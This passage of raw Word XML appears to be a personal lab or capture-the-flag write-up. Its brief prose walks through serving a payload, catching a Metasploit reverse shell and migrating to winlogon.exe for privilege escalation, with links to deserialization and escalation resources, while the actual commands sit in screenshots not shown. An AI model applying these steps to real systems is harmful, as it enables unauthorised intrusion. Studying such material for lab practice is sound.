        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Run a python server to transfer payload to the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AE6718" w14:textId="7923ABC6" w:rsidR="00E30232" w:rsidRDefault="00E30232" w:rsidP="00E30232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Get the payload from the target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B67960" w14:textId="07B9F439" w:rsidR="00E30232" w:rsidRDefault="00E30232" w:rsidP="00E30232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Config the Metasploit to listen on port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00350A77" w14:textId="27097444" w:rsidR="00E30232" w:rsidRDefault="00E30232" w:rsidP="00E30232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Connect and get the reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C10F09D" w14:textId="3BE2947D" w:rsidR="00675B9E" w:rsidRDefault="00675B9E" w:rsidP="00675B9E">
      <w:r>
        <w:t>I won’t write any comment down here for a fews pictures. So if u don’t understand what I’m doing. Try this docs at the DLL hijacking section, it quite similar. (just use executable payload instead of .ddl file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203B99BE" w14:textId="4260C157" w:rsidR="00675B9E" w:rsidRDefault="00675B9E" w:rsidP="00675B9E">
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidRPr="00F50EA4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F2CDD9F" w14:textId="77777777" w:rsidR="00675B9E" w:rsidRDefault="00675B9E" w:rsidP="00675B9E"/>
    <w:p w14:paraId="2098184C" w14:textId="77777777" w:rsidR="00E30232" w:rsidRDefault="00E30232"/>
    <w:p w14:paraId="545BD8DE" w14:textId="7B147C9B" w:rsidR="005B075D" w:rsidRDefault="005B075D">
      <w:r w:rsidRPr="005B075D">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BFD466F" wp14:editId="7B515DAE">
            <wp:extent cx="5943600" cy="2797810"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="179708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846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9C0A" w14:textId="77777777" w:rsidR="00680DF9" w:rsidRDefault="00680DF9"/>
    <w:p w14:paraId="46BE57B6" w14:textId="58EE05E5" w:rsidR="00680DF9" w:rsidRDefault="00680DF9">
      <w:r w:rsidRPr="00680DF9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E64F4D6" wp14:editId="7ADC85CD">
            <wp:extent cx="5943600" cy="1283970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13095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69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FF79" w14:textId="77777777" w:rsidR="00923823" w:rsidRDefault="00923823"/>
    <w:p w14:paraId="07B4BA44" w14:textId="7EDDF9CB" w:rsidR="00923823" w:rsidRDefault="00923823"/>
    <w:p w14:paraId="5B1824DF" w14:textId="53FBDD88" w:rsidR="00384CBD" w:rsidRDefault="00384CBD">
      <w:r w:rsidRPr="00384CBD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="006E842D" wp14:editId="7C3C03F2">
            <wp:extent cx="5943600" cy="2624455"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="137616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660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768D" w14:textId="77777777" w:rsidR="00EC4A1A" w:rsidRDefault="00EC4A1A"/>
    <w:p w14:paraId="246AB76C" w14:textId="03D64410" w:rsidR="00EC4A1A" w:rsidRDefault="00EC4A1A">
      <w:r w:rsidRPr="00EC4A1A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DFDC319" wp14:editId="22EF43EE">
            <wp:extent cx="5943600" cy="2841625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="198134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455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C2A6" w14:textId="77777777" w:rsidR="0020613B" w:rsidRDefault="0020613B"/>
    <w:p w14:paraId="2DE2093F" w14:textId="0F78D01F" w:rsidR="0020613B" w:rsidRDefault="0020613B">
      <w:r w:rsidRPr="0020613B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28D4FFAB" wp14:editId="3A2BCAE9">
            <wp:extent cx="5943600" cy="1397635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="199820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072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60C1" w14:textId="77777777" w:rsidR="000F07DD" w:rsidRDefault="000F07DD"/>
    <w:p w14:paraId="09E9C119" w14:textId="3C7B7C86" w:rsidR="000F07DD" w:rsidRDefault="000F07DD">
      <w:r w:rsidRPr="000F07DD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6864E3BD" wp14:editId="27B0A392">
            <wp:extent cx="5943600" cy="1261110"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="176108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857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9B95" w14:textId="77777777" w:rsidR="006808FC" w:rsidRDefault="006808FC"/>
    <w:p w14:paraId="75D6FA4A" w14:textId="604A23A5" w:rsidR="006808FC" w:rsidRDefault="006808FC">
      <w:r w:rsidRPr="006808FC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17465905" wp14:editId="512DB797">
            <wp:extent cx="5943600" cy="2946400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="123326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678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FFCC" w14:textId="373D8F0C" w:rsidR="00710793" w:rsidRDefault="00710793"/>
    <w:p w14:paraId="1FDBE0BA" w14:textId="77777777" w:rsidR="00710793" w:rsidRDefault="00710793"/>
    <w:p w14:paraId="78477204" w14:textId="77777777" w:rsidR="00710793" w:rsidRDefault="00710793"/>
    <w:p w14:paraId="323168A4" w14:textId="57F5F240" w:rsidR="00710793" w:rsidRDefault="00710793">
      <w:r>
        <w:t xml:space="preserve">ALRIGHT, I’m back, now we have the reverse shell on Metasploits. To </w:t>
      </w:r>
      <w:r w:rsidR="00600A83">
        <w:t>escalate the privilege, we migrate to winlogon.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788E955A" w14:textId="60243A6D" w:rsidR="00600A83" w:rsidRDefault="00600A83">
      <w:r>
        <w:t>ps to find all process are running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BE605D" w14:textId="77777777" w:rsidR="00F910BD" w:rsidRDefault="00F910BD"/>
    <w:p w14:paraId="711BE0D9" w14:textId="6423B620" w:rsidR="00F910BD" w:rsidRDefault="00F910BD">
      <w:r w:rsidRPr="00F910BD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="490EDCF0" wp14:editId="5604CD4F">
            <wp:extent cx="5943600" cy="2859405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="148209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943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0362" w14:textId="77777777" w:rsidR="00F910BD" w:rsidRDefault="00F910BD"/>
    <w:p w14:paraId="05B5B1C8" w14:textId="08FB7B0B" w:rsidR="009730A1" w:rsidRDefault="00F910BD" w:rsidP="00600A83">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1260"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Find the winlogon.exe</w:t>
      </w:r>
      <w:r w:rsidR="00600A83">
        <w:t>. Migrate using ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB7BE51" w14:textId="06F77245" w:rsidR="009730A1" w:rsidRDefault="009730A1">
      <w:r w:rsidRPr="009730A1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DE7882C" wp14:editId="11AACC02">
            <wp:extent cx="5943600" cy="520065"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="212296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672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D3E3" w14:textId="77777777" w:rsidR="00C756C0" w:rsidRDefault="00C756C0"/>
    <w:p w14:paraId="2F001D9D" w14:textId="31A4B979" w:rsidR="00C756C0" w:rsidRDefault="00C756C0">
      <w:r>
        <w:t>Get the shell and all things done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EBD844" w14:textId="77777777" w:rsidR="009730A1" w:rsidRDefault="009730A1"/>
    <w:p w14:paraId="42BFEA7F" w14:textId="760D2907" w:rsidR="00F910BD" w:rsidRDefault="00F910BD">
      <w:r w:rsidRPr="00F910BD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F6DC61E" wp14:editId="4C772F7C">
            <wp:extent cx="5943600" cy="3067685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="140669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973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4960" w14:textId="77777777" w:rsidR="002C0AB4" w:rsidRDefault="002C0AB4"/>
    <w:p w14:paraId="0748A4AB" w14:textId="5BB72647" w:rsidR="002C0AB4" w:rsidRDefault="002C0AB4">
      <w:r>
        <w:t>Good job</w:t>
      </w:r>
      <w:r w:rsidR="00DA35E0">
        <w:t>!!!</w:t>
      </w:r>
      <w:r w:rsidR="000652F3">
        <w:t xml:space="preserve"> See u on the another machine bro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D393B95" w14:textId="77777777" w:rsidR="00A532A9" w:rsidRDefault="00A532A9"/>
    <w:p w14:paraId="34B08D45" w14:textId="716FB70E" w:rsidR="00A532A9" w:rsidRDefault="00A532A9"/>
    <w:p w14:paraId="683A876F" w14:textId="77777777" w:rsidR="00B53FDE" w:rsidRDefault="00B53FDE"/>
    <w:p w14:paraId="1A20A450" w14:textId="77777777" w:rsidR="00B53FDE" w:rsidRDefault="00B53FDE"/>
    <w:p w14:paraId="6F7213C8" w14:textId="77777777" w:rsidR="00002528" w:rsidRDefault="00002528"/>
    <w:p w14:paraId="35574263" w14:textId="77777777" w:rsidR="00F771D9" w:rsidRDefault="00F771D9"/>
    <w:p w14:paraId="514A3549" w14:textId="7FA57E18" w:rsidR="00E75A88" w:rsidRDefault="00E75A88"/>
    <w:sectPr w:rsidR="00E75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728AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4CEA2146"/>
    <w:lvl w:ilvl="0" w:tplc="C24A3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22"/>
    <w:rsid w:val="00002528"/>
    <w:rsid w:val="00051B05"/>
    <w:rsid w:val="000652F3"/>
    <w:rsid w:val="00084C89"/>
    <w:rsid w:val="000F07DD"/>
    <w:rsid w:val="00113770"/>
    <w:rsid w:val="00115CCE"/>
    <w:rsid w:val="00167953"/>
    <w:rsid w:val="001C100D"/>
    <w:rsid w:val="00205973"/>
    <w:rsid w:val="0020613B"/>
    <w:rsid w:val="002123C6"/>
    <w:rsid w:val="00295601"/>
    <w:rsid w:val="002C0AB4"/>
    <w:rsid w:val="002F7031"/>
    <w:rsid w:val="003464E3"/>
    <w:rsid w:val="00384CBD"/>
    <w:rsid w:val="003A7DA5"/>
    <w:rsid w:val="003F2BD8"/>
    <w:rsid w:val="00413AAE"/>
    <w:rsid w:val="004C3253"/>
    <w:rsid w:val="004D10E0"/>
    <w:rsid w:val="004D3508"/>
    <w:rsid w:val="005649D6"/>
    <w:rsid w:val="005B075D"/>
    <w:rsid w:val="005E0D4D"/>
    <w:rsid w:val="005F4C63"/>
    <w:rsid w:val="00600A83"/>
    <w:rsid w:val="00611020"/>
    <w:rsid w:val="006339F0"/>
    <w:rsid w:val="00672588"/>
    <w:rsid w:val="00675B9E"/>
    <w:rsid w:val="006808FC"/>
    <w:rsid w:val="00680DF9"/>
    <w:rsid w:val="006C7922"/>
    <w:rsid w:val="006D44C0"/>
    <w:rsid w:val="00710793"/>
    <w:rsid w:val="00756E68"/>
    <w:rsid w:val="00757085"/>
    <w:rsid w:val="00786F37"/>
    <w:rsid w:val="007C147F"/>
    <w:rsid w:val="0084696D"/>
    <w:rsid w:val="008C24DA"/>
    <w:rsid w:val="008E2886"/>
    <w:rsid w:val="00923823"/>
    <w:rsid w:val="00931032"/>
    <w:rsid w:val="00946BC2"/>
    <w:rsid w:val="009730A1"/>
    <w:rsid w:val="009B4288"/>
    <w:rsid w:val="009B519A"/>
    <w:rsid w:val="009C3EA8"/>
    <w:rsid w:val="00A532A9"/>
    <w:rsid w:val="00A80688"/>
    <w:rsid w:val="00AE457A"/>
    <w:rsid w:val="00B53FDE"/>
    <w:rsid w:val="00B74542"/>
    <w:rsid w:val="00BA2BA0"/>
    <w:rsid w:val="00BC57D0"/>
    <w:rsid w:val="00BD51BB"/>
    <w:rsid w:val="00C06DFC"/>
    <w:rsid w:val="00C4049E"/>
    <w:rsid w:val="00C56C0B"/>
    <w:rsid w:val="00C756C0"/>
    <w:rsid w:val="00C9005A"/>
    <w:rsid w:val="00CB3002"/>
    <w:rsid w:val="00CC0669"/>
    <w:rsid w:val="00CD0657"/>
    <w:rsid w:val="00D23B37"/>
    <w:rsid w:val="00D42A87"/>
    <w:rsid w:val="00D46C55"/>
    <w:rsid w:val="00DA35E0"/>
    <w:rsid w:val="00DB1D4F"/>
    <w:rsid w:val="00DC2706"/>
    <w:rsid w:val="00DD0962"/>
    <w:rsid w:val="00E13D80"/>
    <w:rsid w:val="00E30232"/>
    <w:rsid w:val="00E41CEE"/>
    <w:rsid w:val="00E560CE"/>
    <w:rsid w:val="00E609CD"/>
    <w:rsid w:val="00E75A88"/>
    <w:rsid w:val="00EC4A1A"/>
    <w:rsid w:val="00F431DB"/>
    <w:rsid w:val="00F771D9"/>
    <w:rsid w:val="00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4DD0F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5CDED5C5-35EA-4150-89F0-5EE26F2A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E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71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0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hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter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stackoverflow.com/questions/63639876/powershell-password-decrypt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hyperlink" Target="https://github.com/antonioCoco/RunasCs" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://exploit-notes.hdks.org/exploit/windows/privilege-escalation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pwntester/ysoserial.net?tab=readme-ov-fil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s://soroush.me/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/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7D7D-89CF-4DDC-BFCD-3BDCE3D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7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Minh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nguyen Hoang Minh</cp:lastModifiedBy>
  <cp:revision>100</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-01T15:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-02T16:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>